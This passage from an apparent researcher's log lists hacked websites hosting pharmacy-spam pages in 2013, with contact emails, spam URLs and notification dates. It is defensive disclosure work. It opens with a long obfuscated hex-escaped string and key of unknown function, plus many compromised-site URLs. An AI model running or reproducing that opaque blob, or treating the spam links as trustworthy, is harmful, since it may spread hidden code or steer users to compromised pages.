\x01\x3bP\x3e\x20\x0076Y\x22\x2c\x0eR\x21\x1d\x1d\x06\x20\x04\x00\x15\x1bW\ x2f\x151cF7\x03\x20P\x05\x0aY\x7b6\x0c\x5b\x00Qp\x22\x2f\x05x\x09g\x19\x2aC \x0d=f\x249FX\x0cr\x2e1\x1e1\x25\x0eo5\x7f9\x11\x7f\x3b\x01\x16y\x26\x2a\x1 7NP\x24\x10\x0c\x2dHaj\x04=\x17\x5c\x7e\x0d\x27\x04\x40\x273\x20\x3a\x14\x1 9\x01\x0bqd\x02\x13\x15\x15a\x19\x00\x7b\x13\x24z\x10\x29\x12MX\x20\x07rOb\ x3c\x2c\x05U\x00\x06b\x2e\x0b\x1b\x2f\x03\x078\x0a\x14\x23\x15\x07\x5b\x17\ x00\x3a\x11=\x2c\x3bs\x0f\x1f\x28\x01\x1eN7D\x121\x17\x12\x04\x16\x12\x3b\x 10\x02\x0966\x05\x02\x01\x0b\x06\x19\x26\x06M\x60l\x01\x03\x23\x2e\x2af\x08 \x2c\x0e\x11\x08\x5c\x2b1\x06\x06\x1e\x0aJ\x00\x3a2\x01\x1c\x1cV\x24\x11P\x 0a\x7b\x274\x21L\x090\x2a\x27\x0357\x03\x03\x11\x09\x09\x01Y\x3cp\x05\x5b\x 1a\x5dW\x2d1\x2bAu\x20\x00\x11\x05xmx\x5b\x01\x01\x02\x40\x0a\x07\x2fm\x29\ x11\x3e\x3a8W\x5ert6\x26Bw\x26\x1bu\x7e3\x5e\x3fD\x07\x29\x28\x2e=\x09\x0f\ x20\x7dzCmf\x1dsaf7\x01\x3a\x03Q\x01L\x3bt\x00\x3e\x0c\x40\x23\x21X\x24\x09 0\x03Lm\x22\x2e\x0b\x19N9\x0a\x14\x7b\x17\x21\x2fm\x2b\x16\x2fE\x25\x26\x26 \x20\x07\x2cm\x2d\x2f\x0a\x23\x04u1\x7bG\x1b\x02QS\x1b\x1f2Y\x27\x27\x2d\x1 9\x23\x03\x19\x04\x02\x1114\x1e\x3f6\x20\x29\x5f\x3e\x0b\x02\x15\x27Z\x7d4\ x02\x1b\x2e\x1d\x2e\x1cRG\x19\x2a\x03\x12\x11\x2b\x19\x24\x08f\x17\x7c\x25\ x24\x274X0\x2b\x1b\x3aA\x25\x17\x17\x040\x1c\x5cr\x03T0X\x3e\x2e\x0a\x13\x2 d\x27\x04G\x1bF\x1eST\x1d\x20d\x0a25G\x0b\x25\x02\x2059\x00\x02\x0d\x4055\x 05\x20\x3cqsw\x21y\x12\x22\x25\x00\x01e\x02\x03t\x2356\x0d\x02\x08\x26\x1c\ x0f\x29\x10\x7bao\x2aQ\x28\x0d\x1a\x09\x0aIxT\x0d\x01\x14e\x1e\x10z9\x2a\x5 fn\x066\x0a\x12\x0e\x240\x3eA\x60H\x16\x1dZ\x04O\x3e\x1b\x01o\x003\x01\x274 L\x0a\x28zQ\x60=Y1\x29i\x2b\x2bK\x13\x0e\x13\x1c\x26\x1e\x290\x1axG\x24f\x3 fr5\x2a\x3c\x0d\x226L\x11j=6\x3f\x22\x06y\x7b\x28\x1f\x07\x00Z\x14\x0b\x19\ x08BnH4\x1d\x21\x7e3ed6\x19\x15\x0d\x05V\x22Y\x1e\x09\x7e\x29\x1a\x7b\x05uA \x3c6a\x0a\x104Ts\x2f1C9\x29=\x1eBPaz\x04\x1aC\x16LX\x1d\x27\x05Q9\x06\x24\ x2e\x1a\x08\x5e\x3a\x05z3p\x0eBw\x29\x255\x22K\x27\x240\x3a7\x26\x19\x5d\x0 f6\x11\x23\x3c\x0e\x3eb\x14\x3b\x0e\x07\x1a\x1b\x04\x15\x1eX9\x19\x24=\x5c\ x7cGm\x1d4\x11t\x14\x29\x092\x20\x1e\x3f\x1f\x1b45\x063\x2e\x10\x25B7\x05\x 22=\x5f\x09VQ\x19\x7cz\x16\x2az\x22\x2b\x7f\x2b\x12\x1a7\x10J\x2b\x05\x7df\ x081\x0f\x26Id\x20\x03\x02\x1dR\x26\x08\x2c9\x02TLx\x2f\x40E4\x3e\x1a\x2cC\ x24\x26F\x0ep\x05\x078\x0e\x19\x17\x0c\x04\x1d\x1f\x15\x08\x3e\x24\x09\x0e\ x27\x14\x0f\x00\x02S4\x0c\x20\x24\x27\x22\x0b\x17\x0e\x13\x29\x25\x1f\x17q\ x17PT\x3c\x3f=\x7c=\x1e\x27\x19uT\x2f\x01Ifj\x0d\x1c\x2d\x279\x07Vo23\x14\x 1a\x1c\x10\x2a\x13\x5c\x23\x23ZQ3\x1a\x0aM\x0dx\x2e\x0c\x10\x24=\x2319\x19\ x1c\x1f7\x04e\x7d\x13H\x07\x0ex\x07\x13\x12\x3a03\x1dz\x20\x0dw\x3a\x22\x2e \x1b\x0c\x00\x00\x0e\x3a8\x28\x01\x03\x29\x04c8\x06I\x23\x60\x19\x20\x13\x0 5\x0d2\x11\x1bt\x40z=\x02\x0fAT5t\x2e\x01\x03\x0f\x14\x05\x25Q0\x19\x3b\x10 \x11\x5c\x0f4I\x08\x04\x5f\x05x\x001\x0a\x260\x048\x2d\x0f\x004\x2e9\x0c\x3 f\x17\x099q\x05\x0c\x1bd\x03\x7f\x1bn\x03\x10\x065w\x1bw\x2b\x40\x18\x7d\x1 a\x15\x01\x08\x10\x7e\x40\x2a\x19\x3c\x3c\x40\x7e8Vf5\x0b\x0b\x0e\x5b\x20\x 10\x22\x2bcs\x05\x2d\x17\x2992\x1cG\x15\x1f\x0f\x23IR\x5fU\x2d\x7c\x14\x2c\ x24\x08\x22\x26\x7f\x2188\x00\x09\x10\x2f\x2f\x0a\x1b\x16\x16\x20\x2c\x2b\x 00m\x03m\x19\x1a9wB\x00\x0d\x5f\x10FBdQ\x7f\x1b\x0c\x3a\x14\x11A\x1a\x1d\x1 d\x22\x22\x21\x29h\x1d\x037\x403t\x0f\x2825\x09\x24\x2eD\x3a\x2d\x5f\x26G\x 5d\x2cQ\x11\x12\x0cU\x3cz\x0c13H\x25\x01\x0aR\x28U0\x14Y6\x27S\x10\x29\x13\ x02\x11Z\x28Ib=\x0b\x60\x01\x2eU\x0aq\x7dn\x07\x05\x3c7\x26F\x3e\x2c\x0d\x2 5\x7b\x01A2\x0d\x04\x20\x3e\x00yz\x1bw\x08\x1c\x5d\x28\x23\x01t\x24\x0b\x3c \x3a\x06B\x27a\x27\x24\x11\x7c\x00=\x3f4\x00\x28j\x2djR\x0f\x08P\x01\x29\x3 f\x0e\x2a3\x7c\x27\x15Y\x21\x3b\x3b\x0bI\x02\x1d\x25\x1c\x3b\x21\x1a\x11r\x 23\x03\x60\x03oe2\x20\x09\x03\x28X\x17\x14\x3c\x3b4\x02\x07\x23f\x0d\x2fwCv \x0fG\x3cr\x04\x05h\x00\x06\x19\x2b\x3e\x21\x2c\x17\x1b2n\x18\x60\x29\x3b\x 07l=\x0ebn\x1al\x1e\x3a\x17\x15\x7ci\x1d\x1b\x2c1\x05\x1b\x2c\x29\x3b\x01a\ x0e\x22\x19C\x08\x07f\x60\x2b\x2aG\x1a\x1cC2\x13\x26\x7ec\x26G\x09\x1c\x2c\ x0e\x2a\x05\x017\x03\x3e6T76\x1e\x19\x04\x2a\x07\x03\x08xq\x0c\x3b\x08\x2b\ x05\x1e\x07\x3fY\x7bB7\x08\x1dle\x2a9d\x06Fxi\x01G\x19r1\x18\x3bzC\x3e\x0eg \x16F\x29\x22\x00\x22\x09\x11\x2767\x5cn5\x3a\x1f\x3a9\x23\x01i\x16\x1d8gdA A\x27\x09\x04e\x03\x2ab\x3a\x25\x259\x0d\x20P\x7d9\x22\x2c\x07\x29\x15\x12\ x2eA\x0aK\x13\x1cv\x3fy\x23\x3c\x0b\x1a9\x08\x02\x01\x3f\x19\x2dEe\x04\x2d\ x5d\x0e\x11\x5eA\x02\x2c\x16\x0b\x01\x00\x01\x22v\x071\x16\x07\x17\x5f\x17\ x7e\x023\x06Y\x00\x7dh2\x13\x05\x1a\x1d\x12\x3eu\x08\x00W\x06U\x21\x13\x3b\ x20l\x00\x0b\x11\x3cTa\x0a\x18dC9\x03\x06\x07\x1a\x07E\x27j\x17\x5ba\x5c\x0 7\x03\x23k2C\x2bA\x0e\x04\x03\x2fx\x15\x08\x23\x08r\x0aw\x18\x06\x1d\x23\x0 1u\x16\x00mkL\x0eU39Fz\x28Z\x2f\x25\x29\x00\x22\x18\x240k\x21sS\x04\x23g\x1 7\x7e\x1b\x1e\x2aD\x25c\x2d4\x07\x04M\x5d\x29\x5f\x14FqhA4\x28\x2c\x14\x2d\ x3f1\x1c\x5b\x3f\x3c22Gl\x01gfK\x2b2\x23\x06XD3\x0d2L\x217\x00\x0f\x0d\x00r \x17\x7e\x3a\x0a\x1a\x7f\x02\x162\x22\x0d6\x2d\x10\x1c9S\x7fq\x7e\x5bDZr\x1 d\x3f\x0a\x0bdz\x08\x2bIRo\x1f1\x3f\x02pZ\x14\x2e\x5fe\x042x\x7b\x2b\x0baP\ x3bL9\x1fk\x20\x10\x12L\x00j\x3b\x2cq\x0ds\x05cW9\x138\x11n\x16\x00\x07\x04 \x06\x7e\x3eAe\x28\x17\x3e\x0e\x04\x0a\x1015\x00a3\x0b5\x04\x1ak\x7d\x3e\x2 as\x2f\x1016\x1eE8\x1e\x3b8\x2b1=O\x7e\x12\x2d3\x2eU\x09\x10\x0foVOY\x5dF\x 3aX\x06\x15f\x08l\x17\x2b\x2e\x1a\x2cb\x7e\x1a\x17\x275\x09y\x1b\x125\x2e\x 19G\x1e\x2a\x0f\x17A\x3b\x13h\x27\x0bJ\x1c\x60\x0c\x13\x01\x3a\x5e\x16\x228 3\x28\x04\x0d7\x19XD\x1c0tL\x05\x5d\x03=s\x073u\x09\x0c\x24\x1b\x27F\x12g\x 26ht\x1c\x2d\x12\x03\x2b\x3b\x01\x1bf0\x0dvS\x3c\x06\x2bg\x1b\x21\x24\x06\x 1aL4\x17n\x2d\x02\x21\x2e\x15\x7f\x2c\x0fm\x07\x2aU2n\x1cw\x26\x7c9BG\x041\ x275\x0b\x1b\x08\x2a2\x25d\x0a\x2a\x07\x0fs\x24\x09\x23x\x5dL\x2aD\x05e\x3c 0\x07\x1e\x01o\x20\x17j\x1b\x20\x1d79\x1e\x043\x3b7S\x29\x23\x03R\x1cR\x15\ x199\x29\x06C\x030q\x10n\x7c\x25\x06\x0d\x25\x1d\x0a\x2a\x27\x0b\x1b\x21H\x 233\x144qtD\x20\x04r\x60\x0by\x10\x14r\x01\x21t7\x2b\x17\x095u1\x1bd\x088\x 1a7\x2d\x5c5\x2e=\x04\x1axef\x23\x3a\x7bC\x0ct\x7d\x00\x0e\x13\x3e\x16Y0\x0 3\x0ac\x16Y013\x2d\x5b\x2a\x1fV\x1e\x3b\x7f\x08\x00\x11I\x3aK0\x13\x0f\x1c5 \x1b\x1f\x04d\x13\x032\x0du\x1b\x2c\x0b\x19\x17\x5dEP\x3a5W\x02\x1dv\x5c54\ x01W=h\x3fSz\x1e\x5c\x1bV\x3a\x01\x03\x02\x16\x23Hz\x2a\x7b\x0b\x03\x0d\x1b \x0b\x06\x19Te\x29D\x2biU\x10\x07\x3f\x1a\x04\x0d5\x3f9\x0c\x0aSG\x1d\x1f\x 7bX\x21\x04\x19\x3f\x1c\x03\x14\x0e\x119\x28\x27j\x2d\x7c\x111z\x1cy\x1d\x0 3\x05\x27U12\x13\x26\x0d4\x3a\x5bO\x3a3\x18\x2c\x25q\x23J\x23x\x07\x3f\x23\ x23\x00\x27\x18\x24\x15w\x01\x3e\x40gNdoj\x251\x1c\x1cY\x04=\x10\x11V\x5dv\ x0e1\x2d\x0b6\x06\x1a\x0fY7\x2f0\x3f\x11V\x05\x13\x5eow=\x2c0\x06C\x7ev\x17 l\x3f\x2d\x1e0i\x03X\x1dC\x13\x18\x28\x1euf0\x01M\x11\x20\x21C\x0b\x19\x26\ x29\x0d\x06\x0d\x0a\x21\x21\x7e\x3c4f\x20\x1f\x23\x0a\x10\x23\x16\x08\x10r\ x0e\x3c\x3a8\x27\x0et5\x3cr\x3c\x0c\x01V\x0432x\x3c\x11\x10\x0c\x1e8\x05s\x 0aaaz\x1d2\x3c\x1d\x22\x0d\x3f\x0e\x00\x1a\x3f\x17\x23l\x0a\x05E\x19Y\x02\x 1eS0\x18\x11\x40=\x7bz1I\x02\x16\x02\x04\x7e\x1a\x22\x3c\x0cC\x3c\x7d8\x05\ x21\x05S\x02\x16\x3fe\x00\x25l\x087\x24\x1b\x06D\x2db\x00\x02\x3c\x12T\x17\ x0a\x0175Ja\x0do6\x024\x04\x20\x054\x0f\x2a\x26\x06=4\x3e\x1f\x207\x2d\x15\ x18\x27\x5c\x24\x2c\x3f\x0655k\x014\x3f6\x08i\x22B\x163f\x40\x08\x22rlCE\x0 a\x02\x22\x24\x02XX\x17\x3f63\x2c7\x065\x16\x2c\x22\x14\x20\x21\x23\x18v\x7 eS\x2cg\x14\x2b\x1aDb\x097\x3ev\x09\x16k\x3b\x04\x16\x2a\x3f\x09\x211\x2aXz ag\x2c8XWA\x11\x0e\x3b9\x04\x182\x07\x2f\x21\x5d\x7dsy\x289\x60\x12\x15\x7b \x40a\x0b\x013\x3e\x19\x2cy\x28\x1f\x1a\x3e\x03\x02\x2do\x1b\x10u\x04\x27\x 1d\x1474\x1b\x0dA\x06\x27\x1d0\x0f\x5cB\x3a\x07\x1bh\x1a\x40\x25\x5f\x1f\x0 1Cx\x27\x1bo\x2a\x19\x13\x22W\x3f\x01\x1a3X\x0a\x0a\x1ba6\x60\x27\x21=\x20k \x1aT\x13\x3ao\x25\x04WqNIQLHE\x5f", "IwOIddDwZObky1eqwBAZlfY");

20. More Top Hits (11-30-13)

More very general searches as specified below
Organization Emails Malicious URL

Hits for "Viagra"

Hit 11. kim-stafford.com
Writer in Oregon
Whois leads to:
abuse@godaddy.com
krs@lclark.edu

Reported on 11-30-13

http://kim-stafford.com/?lze=810
Directly hosted page
Hit 31-21. rvrphoto.com
Photography in Ohio
rkoti@me.com
abuse@godaddy.com
vamsi@vam.si

Reported on 11-30-13

http://rvrphoto.com/www-viagra-sales/
http://rvrphoto.com/ed-50mg-viagra/
Linked from an infected page: bioimagexd.net
Open Source Medical Imaging Software
info@bioimagexd.net
support@netfirms.com
lassi.paavolainen@jyu.fi

Reported on 11-30-13

http://www.bioimagexd.net/www-viagra-uk/
http://www.bioimagexd.net/on-viagra-spain/
http://www.bioimagexd.net/www-buy-viagra-on-the-internet/
http://www.bioimagexd.net/med-50mg-viagra/
Linked from an infected page: annehills.com
Singer
booking@annehills.com
anne@annehills.com
abyse@web.com
annehills@juno.com
mark-web@singout.org
robbietrapp@hotmail.com

Reported on 11-30-13

http://www.annehills.com/md-cheap-viagra-from-canada/
Hit 33: thejameshouse.org
Help for persons who have been sexually abused, in Virginia
chana@thejameshouse.org
jane@thejameshouse.org

Reported on 11-30-13

http://thejameshouse.org/?an=784
Hit 34: africanamericansoul.com
abuse@godaddy.com
AFRICANAMERICANSOUL.COM@domainsbyproxy.com

Reported on 11-30-13

http://africanamericansoul.com/?jnk=284
Hit 35: dfma.org
Durham FM Association
http://dfma.org/index.php?option=com_contact&view=contact&id=1&Itemid=24

Reported on 11-30-13

http://dfma.org/?yx=795
Hit 36: jasonshaeffer.com
support@netfirms.com
jasonshaeffer@gmail.com

Reported on 11-30-13

http://jasonshaeffer.com/web-viagra-rx/
Hit 37: sikorskyarchives.com
CT
iisha@snet.net
LIBERTINO481@YAHOO.COM
abuse@godaddy.com
johnmk26@optonline.net

Reported on 11-30-13

http://www.annehills.com/md-cheap-viagra-from-canada/
Hit 39: gingergrayhamartgallery.com
Site looks abandoned since 2002
josh@coyote-canyon.com
abuse@wildwestdomains.com
GINGERGRAYHAMARTGALLERY.COM@domainsbyproxy.com

Reported on 11-30-13

http://gingergrayhamartgallery.com/?ib=629
Hit 40. www.abeewell.com
Registered in Russia, no real website, no one to notify http://www.abeewell.com/

Hits for "Cialis"

Hit 11. huwib.org
Harvard Undergraduate Women in Business, On-Campus, Harvard, MA
kshankar@huwib.org
rwang@huwib.org
hlim@college.harvard.edu
info@huwib.org

Reported on 11-30-13

http://huwib.org/?mfh=798
Hits 12-16. seamass.org
Strutural Engineers Association of MA
Contact page missing, but Google cache has one from Nov. 1, 2013
Officers page missing
About page missing

Google says "This site may be hacked"

info@seamass.org
president@seamass.org
david@technicalsol.com

Reported on 11-30-13

http://www.seamass.org/cialis-action/
http://www.seamass.org/the-cialis-commercial/
http://www.seamass.org/dr-cialis/
http://www.seamass.org/a-cialis-dosage/
http://www.seamass.org/cialis-in-botlle/
Hits 17-21. honorflighttwincities.org
MN
crazyjerry45@hotmail.com
abuse@honorflighttwincities.org
security@honorflighttwincities.org

Reported on 11-30-13

http://honorflighttwincities.org/a-carvedilol-cialis/
http://honorflighttwincities.org/ed-cialis-action/
http://honorflighttwincities.org/a-cialis-action/
http://honorflighttwincities.org/now-5mg-cialis/
Hit 23. musehousecenter.com
musehousecenter@gmail.com
abuse@web.com
em@a2pwebdesignn.com
webmaster@a2pwebdesignn.com

Reported on 11-30-13

http://musehousecenter.com/?pav=852
Hit 25.laennecsocietyphilly.org
laennecsocietyphilly.org/cialis-pills/‎
Home page hacked, and many others, including the contact page
Hit 26. krcs.org
The Kansas Respiratory Care Society
suzanne.bollig@haysmed.com
curtis.kidwell@viachristi.org
dconyers@kumc.edu

Reported on 11-30-13

http://krcs.org/?mu=957
Hit 28. shoplocalunioncounty.org
info@shoplocalunioncounty.org
ispwebmaster@nrtc.coop
ispwebmaster@nrtc.org

Reported on 11-30-13

http://shoplocalunioncounty.org/?yh=655
Hit 29. lindsay-stern.com
lstern13@amherst.edu
editor@scramblerbooks.com

Reported on 11-30-13

http://lindsay-stern.com/?sx=701
Hit 36. kayakcentre.com
RI
funn@kayakcentre.com
abuse@web.com

Reported on 11-30-13

http://kayakcentre.com/?nlc=4
Hits 37-38. www.ncherm.org
Safer Schools in PA
brett@ncherm.org
daniel@atixa.org
kate@ncherm.org

Reported on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=37&ved=0CGUQFjAGOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523163&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNH364-8GMxasYfp3NRR-O28jyCYGg&sig2=a-YGpqrOUYHMwpyafcBnlQ&bvm=bv.57155469,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=38&ved=0CGwQFjAHOB4&url=http%3A%2F%2Fwww.ncherm.org%2F%3Fid%3D523146&ei=CWGaUrnQIMzmoATosYGgBA&usg=AFQjCNEaX0pKE5rm6vgGxLnaawb7nc5HrA&sig2=Evx-gEJC8Ft29ZMuCLDcWw&bvm=bv.57155469,d.cGU

Hits for "Levitra"

Hit 20. elupton.com
Art critic in NYC, works at the Smithsonian
abuse@web.com
cooperhewittpress@si.edu
cheducation@si.edu

Reported on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIwBEBYwCTgK&url=http%3A%2F%2Felupton.com%2Flevitra-online-shopping%2F&ei=anSaUt23CcL3oATa64DQCw&usg=AFQjCNHCTfQkSNjiD1Pg277HR2mkACDLiQ&sig2=aGO9sPWuMV-iTEKkLQJYpA&bvm=bv.57155469,d.cGU&cad=rja
Hit 24. nintendoeverything.com
http://nintendoeverything.com/contact-us/

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CE8QFjADOBQ&url=http%3A%2F%2Fnintendoeverything.com%2Flevitra-overnight%2F&ei=EHeaUt3CGNDhoAScmoLoDA&usg=AFQjCNGUMuBxkohDi73l49gNteVswgpZwA&sig2=A9K4p0NwxpKirvLQiR-VLw&bvm=bv.57155469,d.cGU
Hit 32. www.thesmell.org
Los Angeles Art Space
http://www.thesmell.org/contact

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CE0QFjABOB4&url=http%3A%2F%2Fwww.thesmell.org%2F&ei=YnmaUv6wN4n3oASg5ICoCA&usg=AFQjCNFyvDQw020irw1tkS0kbveE9cYflw&sig2=3iknvwdTneGHEMpZHtGWtg&bvm=bv.57155469,d.cGU

Hits for "buy oxycontin online"

Hit 37. gravatar.com
compliance@markmonitor.com
domains@automattic.com

Informed on 11-30-13

gravatar.com/seroxycontiner
Hit 47. www.wpda.org
World Parksinson Disease Association
info@wpda.org
aip@fondazioneparkinson.com
gianluca@parkinson.it
support@register.it

Informed on 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=47&ved=0CFoQFjAGOCg&url=http%3A%2F%2Fwww.wpda.org%2Fappuntamenti.html&ei=UH6aUrvEA8zjoAT4lIKQDw&usg=AFQjCNGNQuJ5VcTxDyyoJnGod70cYSlNKA&sig2=1pKfr7eeBoHHgZb4ARetzw&bvm=bv.57155469,d.cGU

Hits for "buy oxy"

Hit 25. https://archive.org/
info@archive.org

Informed on 11-30-13

https://archive.org/details/Oxy5Mg30Mg

Hits for "vardenafil"

Hit 26. hugetheater.com
butch@hugetheater.com
jill@hugetheater.com

Contacted 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=26&ved=0CFoQFjAFOBQ&url=http%3A%2F%2Fwww.hugetheater.com%2Fabout-us%2Fdonate%2F&ei=tZ6aUsa8DZbcoASHvICYCA&usg=AFQjCNHIvCeV7jqz6PPDQW-gGhSuCOi3Fg&sig2=dhKAVGdbEftOyy58dQMYYA&bvm=bv.57155469,d.cGU
Hit 29. thedeadexs.com
info@thedeadexs.com

Informed on 11-30-13

http://thedeadexs.com/vardenafil/
Hit 32. actualidad7.com
ad@actualidad7.com
redaccion@actualidad7.com

Informed on 11-30-13

http://actualidad7.com/cheapest-vardenafil/
Hit 33. aceita.com.br
negocios@aceita.com.br
suporte@aceita.com.br

Informed on 11-30-13

http://aceita.com.br/vardenafil-hcl-20mg/
Hit 38. larryelmore.com
sales@larryelmore.com

Informed on 11-30-13

http://larryelmore.com/vardenafil-cheapest/

Hits for "284-3222"

Hit 7. www.whereisasturias.com
Twitter: @whereisasturias

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CF8QFjAG&url=http%3A%2F%2Fwww.whereisasturias.com%2Fcanada%2F%3Fa%3D322&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNE0qR8SUJi4t9Qr_I7c2yypUR0LmQ&sig2=COhUDi7uTC6VtrrA77EKig&bvm=bv.57155469,d.cGU
Hit 8. www.nlsd113.com
Northern Lights School Division, Canada
centraloffice@nlsd113.net
suboffice@nlsd113.net

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGYQFjAH&url=http%3A%2F%2Fwww.nlsd113.com%2Frr%2Findex.php%3Fp%3D859&ei=eJabUsr-KIXUoASo-YLIAQ&usg=AFQjCNEhHshG2GZ5KQAapm1uGpcm9JfyOw&sig2=Iu19xuS3akpXaZcswkP5HA&bvm=bv.57155469,d.cGU

Hits for "buy armidex"

Hit 1. healthyagingcouncil.org unthsc.edu
U. of N. texas
UNTSweb@untsystem.edu
webmaster@unthsc.edu
urcm@unt.edu

Informed 12-1-13

http://www.healthyagingcouncil.org/getarimidex/
Hit 5. www.purevolume.com
Music promoter
randy@purevolume.com
vchang@spinmedia.com
brittany@purevolume.com

Informed 12-1-13

http://www.purevolume.com/arimidex
Hit 6. www.zestcreative.ie
Design co. in Ireland
info@zestcreative.ie

Informed 12-1-13

http://www.zestcreative.ie/rev/.svn/arimidex.html
Hit 9. flavors.me
http://us.moo.com/help/contact-us.html

Informed 12-1-13

http://flavors.me/midelle
Hit 10. www.bainesdesign.co.uk
info@bainesdesign.co.uk
hello@barleyhousegroup.co.uk

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CIYBEBYwCg&url=http%3A%2F%2Fwww.bainesdesign.co.uk%2F%3Fp%3Dbuy-arimidex%26k%3D5&ei=KpqbUvb6LofooASFjYGoAw&usg=AFQjCNEYQD_mcQ8rfHm4V2z1Uy0Yr6qnWA&sig2=5oDKCKKgEsK5_ZUaLwRxvQ&bvm=bv.57155469,d.cGU
Hit 14. cafemomentum.org
Restaurant in Dallas, TX
jef@tingleycomm.com
chad@cafemomentum.org

Informed 12-1-13

http://cafemomentum.org/products/buyarimidex/
Hit 20. kingamplification.com
Guitar store in CA
val@kingamplification.com

Informed 12-1-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIcBEBYwCTgK&url=http%3A%2F%2Fkingamplification.com%2Farimidex.html&ei=PaKbUrKTKI7roAT0kYDYBw&usg=AFQjCNFUQIlb--0VoKgKXsusVsfjpqGBOQ&sig2=prWvmOykCCSfC0ksfpBjTg&bvm=bv.57155469,d.cGU

21. .GOV Sites (12-12-13)

Today on Twitter I saw this:
Mustafa Al-Bassam
@musalbas
Why is the U.S. government running an online Canadian Viagra store? chambersburgpa.gov/oldwebsite/


Bill Schnift
@BillSchnift
@musalbas @sambowne loves this stuff.
Indeed I do!
Organization Emails Malicious URL

Hits for "inurl:.gov intitle:viagra"

Hit 3. www.winchester-in.gov
City of Winchester, Indiana
druss@egovstrategies.com
mayor@winchester-in.gov

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEUQFjAC&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=Aq9hfsg6_DwPIowI2IL4HQ&bvm=bv.57967247,d.cGU
Only visible from Google link
Hit 5. www.gsnmagazine.com
Government Security News
jgoodwin@gsnmagazine.com
mccabe@gsnmagazine.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFMQFjAE&url=http%3A%2F%2Fwww.gsnmagazine.com%2Fnode%2F28233%3Fz3nub%3D414895&ei=WwWqUqSpO4XdoASlyILYDQ&usg=AFQjCNGC21DO-QJCwCECr0p9hiCnqK4AkA&sig2=l71g5B7a2Jzbb6EjaLwv1w&bvm=bv.57967247,d.cGU

Hits for "inurl:.gov intitle:viagra" (Region: US)

Hit 11. rivnet.com
Riviera Telephone Co., Texas
rtc.ofc@rivnet.com
rtc@rivnet.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CDYQFjAAOAo&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fgov-uk-buy-viagra.html&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFLOrW37ODZoFuG3Upsrcbp38DkYw&sig2=Q64ynabmgfQj_kcQNtZHng&bvm=bv.57967247,d.cGU
Hit 13. www.s-5.com
Roofing company in Colorado
info@s-5solutions.com
info@30dps.com

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEYQFjACOAo&url=http%3A%2F%2Fwww.s-5.com%2Fscm%2Fscm%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNFYstWR-jxhLGG__fAGOPwjcnJswA&sig2=UhmmzrF23qIqnR9flmvAWw&bvm=bv.57967247,d.cGU
Hit 17. www.wmuseumaa.org
Westmoreland Museum, PA
info@wmuseumaa.org
membership@wmuseumaa.org

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CGYQFjAGOAo&url=http%3A%2F%2Fwww.wmuseumaa.org%2Frfq%2Fwestminster-gov-uk-viagra%2F&ei=jQyqUteDFI3voATV1YEI&usg=AFQjCNH08xGofrj02rLKbF9IkLdQAh6h6Q&sig2=FY1z4oNR7GqcbEF9vTHv_g&bvm=bv.57967247,d.cGU
Hit 30. www.jamescitycountyva.gov
James City County VA
County.Administration@jamescitycountyva.gov
jccnews@jamescitycountyva.gov

Reported on 12-12-13

http://www.jamescitycountyva.gov/online-viagra/
Hit 44. www.intgovforum.org
Internet Governance Forum
igf@unog.ch

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=34&ved=0CEMQFjADOB4&url=http%3A%2F%2Fwww.intgovforum.org%2Fcms%2Fdynamic-coalitions%2F72-ibr%3Faw50z%3D270581&ei=3g-qUr-4LNPdoAS5hID4DA&usg=AFQjCNG-CKzx7BiMANwYbjCY1Z3PrVmfWQ&sig2=k2i9iFMcwfgJfY2nPgm4iA&bvm=bv.57967247,d.cGU
Hit 57.
chambersburgpa.gov
jwright@chambersburgpa.gov
plagiovane@chambersburgpolice.com
boroadmin@chambersburgpa.gov

Reported on 12-12-13

http://www.chambersburgpa.gov/oldwebsite/
Hit 71. fabius-ny.gov
Town of Fabius N.Y
webmaster@fabius-ny.gov
townclerk@fabius-ny.gov

Reported on 12-12-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=62&ved=0CDIQFjABODw&url=http%3A%2F%2Fbuy-viagra.fabius-ny.gov%2F71.html&ei=BBKqUsvAIcP1oASjxIDoDQ&usg=AFQjCNFY_LNW_o_XwssjGWxPGA6YS2zzFQ&sig2=OAlm2-pKTZKBrTMgSzNYjQ&bvm=bv.57967247,d.cGU


Changelog

Posted 2:22 PM 11-9-13 by Sam Bowne
"More Infected Servers" added 1:37 pm 11-10-13
Results posted 6:10 pm 11-12-13
Another round of notifications 11-15-13
Chatham added 8:41 PM 11-15-13
Infections tested 5 pm 11-16-13
Directory and further BYU analysis added 1:36 PM 11-18-13
